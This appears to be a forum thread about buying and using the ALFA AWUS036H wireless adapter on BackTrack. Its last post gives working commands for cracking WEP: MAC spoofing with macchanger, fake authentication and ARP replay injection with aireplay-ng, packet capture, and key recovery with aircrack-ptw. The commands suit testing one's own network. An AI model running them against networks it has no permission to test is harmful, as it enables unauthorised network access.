Page 1 of 2 12 LastLast

Thread: purchasing ALFA Networks AWUS036H

Default purchasing ALFA Networks AWUS036H

I havnt been able to find an online store where it is availabe, any suggestions

Code:
    http://cgi.ebay.co.uk/ws/eBayISAPI.dll?ViewItem&ih=019&sspagename=STRK%3AMEWN%3AIT&viewitem=&item=290077228200&rd=1&rd=1
    Code:
    http://cgi.ebay.de/Highpower-500mW-USB-Wlan-Adapter-abnehmbare-Antenne_W0QQitemZ200098766671QQcategoryZ108239QQcmdZViewItem
    I also email the company about price quotes. They told me that "Samples" are $35... Might be able to social engineer one for that price. Since every where else is almost $80. Talk about a hugh markup.

do you know the site for the company, i googled, but i get 3 different network sites called alfa

yeah the site is www.alfa.com.tw

Product page

http://dplanet.biz/alfa.com/product_...roducts_id=342

I got this card myself its a beast!!

It sure is johnyt!

Can I just ask you though:

1) Are you using BT1 or BT2 or other version of Linux?

2) Is your linux/BT installed on your PC, or running in a VM machine etc.

3) When you put the Alfa in monitor mode how long does it take to respond?

4) Assuming you have a very good signal from an AP. When you inject, how many packets/sec do you receive back. Ie, I only get about 20-100ivs/s using the ALfa, but 300+ per sec with my D-Link.

Thanks mate!

Talking

Hi

1) I'm Using BT 2.0 Final

2) I'm running it from USB flash drive

3) I run it from Kismet the whole things loaded and ready to go in a few seconds

4) It really depends on what you mean by a good signal. The Alfa is more powerful than your dlink so it will also pick up more noise than your d-link does. If your router is sharing the same channel ( or even near ) as others in your area the Alfa can pick these up along with other wifi adaptors ect. All this extra noise can reduce consistency and slow down the old injection there. Also having high power radio devices too close together can be damaging. I have seen speeds as low as 50iv/s up to almost 200 iv/s. Its horses for courses, at the end of the day you loose a bit of speed for having a device that has a longer range its just the characteristics of radio. But hey what’s the rush I've had aircrack-ptw cracking 64bit after just 15-20k ivs 104bit with 60-80k

But once actually connected to device I get full 54g connectivity as long as there is a consistent signal 35% or higher. Again having other devices sharing the same channel can affect the consistency of that.

Hope this helps

Thanks for the quick response.

4) Yes very good points about the noise, something I didn't appreciate but makes sense now that you mention it. The speed itself isn't important (as you say with aircrack-ptw 50,000 ivs now seems like an extravagance!) but there are definitely some qwerks with the (perhaps just my) alfa.

Do you also notice that when you scan with airodump-ng a lot of networks can show up with a signal strength of 100-140? As I walk around my house I can get ranges from 80-130, which just seems a little strange to me (why is the driver allowing > 100 ?)

Also, as I said assuming I'm downstairs giving a good 10 -15 meters clearance from my AP, with good signal strength, my ivs/sec fluctuates between 5/sec and 120/sec. Nothing is stable, it will bounce up and down all the time.

Seeing as my D-link maintains a constant 300+/sec, I automatically assumed I was doing something wrong!

However - that all said, the Alfa IS an amazing device with the range on it that is just staggering!

Well yes there could be all sorts of reasons that are probably way out of my leauge. Could just be the way your router takes to that particular card. Have you tired it with differant routers at all?

Just tried it on 3 different routers - same problem. Ah well.

If you get a moment would you very quickly/roughly explain how you use kismet to start all the aircrack-ng tools?

I don't think I follow you there and it would be nice to have that cleared up for me! Thanks alot for you time.

Ok shame to see our having problems there. I did see my alfa making over 320 iv a second last night so let me tell you how I do mine.

I have mainly only messed about wiht no client present meathods as I only have 1 computer at the moment

First of all I am running the live cd files from usb pen drive.
    I have put the aircrack-ptw file copied to the root directory

I open up a console and create about 5 shells in the same window to make it easy

Shell 1:
    macchanger --mac 00:11:22:33:44:55 wlan0
    This give your adaptor a fake mac adress

Then I open Kismet:
    I hit shift+s to sort then hit c to sort by channel. Hit enter on my ap to view info on the ap. like channle number mac adress and the routers name. Hit q to get out of that then shif+l to lock the wifi adaptor to that channel

Shell2:
    aireplay-ng -1 0 -e BTHomeHub-AAAA -a 00:14:7F:9F:B6:C2 -h 00:11:22:33:44:55 wlan0
    This should create a fake authentication.

Shell3:
    airodump-ng -w abc -c 001 wlan0
    Runs ariodump on channel 1 saving to abc-01.cap

Shell4:
    aireplay-ng -3 -b 00:14:7F:9F:B6:C2 -h 00:11:22:33:44:55 wlan0
    This should start off the injection ( usualy after 10 - 20 seconds )

Shell5:
    aircrack-ptw abc-01.cap
    If you hav set up your router with 64bit encryption then run this off after about 20,000 - 25,000 packets 104bit will probably need more like 70,000 or more.
    Also need to make sure you have the aircrack-ptw file in the root directory

I have a txt file with all the commands saved so all i have to do is copy and paste the info from kismet then copy pase the commands into the shell windows, saves a lot of typing! If you dont already have aircrack-ptw baxter has a sticky in the noob section where you can download it.

Any more help you need with the alfa you or any one else can pm me

Page 1 of 2 12 LastLast